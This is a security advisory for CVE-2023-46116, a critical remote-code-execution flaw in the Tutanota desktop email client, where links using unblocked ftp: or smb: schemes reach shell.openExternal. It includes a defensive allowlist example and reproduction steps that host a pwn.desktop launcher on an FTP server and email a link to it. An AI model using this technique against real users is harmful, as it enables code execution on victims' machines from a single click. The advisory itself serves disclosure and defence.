Remote Code Execution via insufficiently sanitized call to shell.openExternal

Critical
charlag published GHSA-mxgj-pq62-f644 Dec 15, 2023

Package

npm tutao/tutanota (npm)

Affected versions

<=3.118.8

Patched versions

3.118.12

Description

Summary

Tutanota allows users to open links in emails in external applications through Electron's shell.openExternal. It correctly blocks the file: URL scheme, which a malicious actor could otherwise use to gain code execution on the victim's computer, but it fails to reject other harmful schemes such as ftp: and smb:. Those schemes are handed to the operating system's URL handler just like a web link, and, as the steps below show, a link of that kind pointing at an attacker-hosted .desktop file is enough to get a program launched on the victim's machine.
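As an added example (not Tutanota's code, and not the fix that shipped in 3.118.12), the following Node.js snippet contrasts the two ways of gating a call to shell.openExternal that the summary describes: a blocklist that rejects only file:, beside an allowlist that admits only the schemes the application needs. The function names blocklistAllows, allowlistAllows, openExternalSafely and compareChecks, the allowed-scheme set and the sample links are assumptions for illustration; shell.openExternal itself is replaced by an injected open callback so the block runs without Electron.

```javascript
// Added example, not Tutanota's code: gating shell.openExternal by URL scheme.
// Runs on plain Node.js; `open` is injected so no Electron dependency is needed.

function parse(href) {
  try {
    return new URL(String(href).trim()); // WHATWG parser (global in Node.js)
  } catch {
    return null; // relative, empty or malformed: never something to hand to the OS
  }
}

// The flawed check the advisory describes: only file: is rejected, so ftp:,
// smb:, javascript: and any scheme invented later fall through to the OS handler.
function blocklistAllows(href) {
  const u = parse(href);
  return u !== null && u.protocol !== "file:";
}

// Hardened check: admit only the schemes the application actually needs
// (this set is an assumption for the example).
const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]);

function allowlistAllows(href) {
  const u = parse(href);
  if (u === null) return false;
  // WHATWG parsing lowercases the scheme, so "FTP://" and "ftp://" compare equal.
  if (!ALLOWED_SCHEMES.has(u.protocol)) return false;
  // Embedded credentials (ftp://user:pass@host/...) are a phishing and leak vector.
  if (u.username !== "" || u.password !== "") return false;
  return true;
}

// Drop-in wrapper: in an Electron app `open` would be shell.openExternal.
// Returns true only if the URL was actually handed to the opener.
function openExternalSafely(href, open) {
  if (!allowlistAllows(href)) return false;
  open(href);
  return true;
}

// Constructed sample links of the kind an attacker could embed in an HTML email.
const SAMPLE_LINKS = [
  "https://example.com/",
  "mailto:someone@example.com",
  "file:///etc/passwd",
  "FILE:///etc/passwd",
  "ftp://username:password@192.0.2.10/pwn.desktop", // shape of the advisory's PoC link
  "smb://192.0.2.10/share/pwn.desktop",
  "javascript:alert(1)",
  "not a url",
];

// Side-by-side verdicts of both checks for each sample link.
function compareChecks(links = SAMPLE_LINKS) {
  return links.map((href) => ({
    href,
    blocklist: blocklistAllows(href),
    allowlist: allowlistAllows(href),
  }));
}

console.table(compareChecks());
```

Running the block prints a table in which the ftp: and smb: links to pwn.desktop pass the blocklist but fail the allowlist. Two details matter beyond the scheme set: parse failures are treated as "do not open" rather than as "not file:, so fine", and the comparison is made on the parsed, normalised protocol rather than on a string prefix, so case variants such as FILE:// and leading whitespace cannot slip past the check.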

Details

Steps to Reproduce

This PoC uses Ubuntu with the XFCE desktop environment, since that is the least complicated setup on which to reproduce the issue.

  • Run the Tutanota desktop version 3.118.8 AppImage on an Ubuntu desktop with the XFCE environment and sign in.
  • On another machine, host an FTP server with anonymous access enabled. Create a pwn.desktop file in the FTP root with the following content:

    [Desktop Entry]
    Exec=xcalc
    Type=Application

  • Send an email to the account signed in on Tutanota containing a hyperlink pointing to the pwn.desktop file on the FTP server, replacing the placeholders with the server's values: ftp://username:password@ip-address/pwn.desktop
  • In the Tutanota desktop application, click the hyperlink in the received email. Observe that the calculator application opens. In some cases you may need to confirm execution of the application.

Impact

Successful exploitation of this vulnerability enables an attacker to gain code execution on the victim's computer. The only user interaction required is a click on a link in an email (and, on some desktops, confirming the launch of the application).

Severity

Critical 9.3 / 10

CVSS base metrics

Attack vector: Network
Attack complexity: Low
Privileges required: None
User interaction: Required
Scope: Changed
Confidentiality: High
Integrity: High
Availability: None
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

CVE ID

CVE-2023-46116
